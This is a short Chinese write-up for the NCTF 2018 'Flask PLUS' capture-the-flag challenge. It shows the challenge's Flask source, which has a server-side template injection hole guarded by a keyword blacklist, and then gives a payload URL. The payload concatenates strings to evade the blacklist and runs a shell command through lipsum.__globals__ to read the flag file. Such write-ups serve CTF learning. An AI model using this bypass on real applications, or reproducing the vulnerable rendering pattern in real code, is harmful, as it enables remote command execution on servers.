0%

[NCTF 2018]Flask PLUS的题解

2025-09-24 20:00By
BITs2SysPlayer0
SSTIPythonFlask

Problem: [NCTF 2018]Flask PLUS

通过SSTI可以得到源码:

#!/usr/bin/env python
# -*- coding: utf-8 -*-

from flask import Flask, render_template, render_template_string, redirect, request, session, abort, send_from_directory
import os
from urllib import parse

app = Flask(__name__)

@app.route("/")
def index():
    "主页"
    return render_template("index2.html")

@app.errorhandler(404)
def page_not_found(e):
    def safe_jinja(s):
        blacklist = [
            'import', 'getattr', 'os', 'class', 'subclasses', 'mro', 'request', 
            'args', 'eval', 'if', 'for', 'subprocess', 'file', 'open', 'popen',
            'builtins', 'compile', 'execfile', 'from_pyfile', 'config', 'local',
            'self', 'item', 'getitem', 'getattribute', 'func_globals', '__init__',
            'join', '__dict__'
        ]
        flag = True
        for no in blacklist:
            if no.lower() in s.lower():
                # print(no.lower())
                flag = False
                break
        return flag

    template = '''
    {% block body %}
    <div class="center-content error">
        <h1>Oops! That page doesn't exist.</h1>
        <h3>%s</h3>
    </div>
    {% endblock %}
    ''' % (parse.unquote(request.url))

    # print(parse.unquote(request.url), safe_jinja(parse.unquote(request.url)))
    if safe_jinja(parse.unquote(request.url)):
        return render_template_string(template), 404
    else:
        return render_template("404.html"), 404

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=5000)

Flag在 ../../../Th1s_is__F1114g,比较奇怪的本题似乎限制了单个字符串的长度,所以路径可以这么写'cat ../..'+'/..'+'/Th1s_is__F1114g'

Payload

http://node4.anna.nssctf.cn:28442/%7B%7Blipsum.__globals__['o'+'s']['po'+'pen']('cat ../..'+'/..'+'/Th1s_is__F1114g').read()%7D%7D
还没有人赞赏,快来当第一个赞赏的人吧!
  
© 著作权归作者所有
加载失败
广告
×
评论区
添加新评论
文章信息
板块WEB
作者
BITs2SysPlayer0
目录导航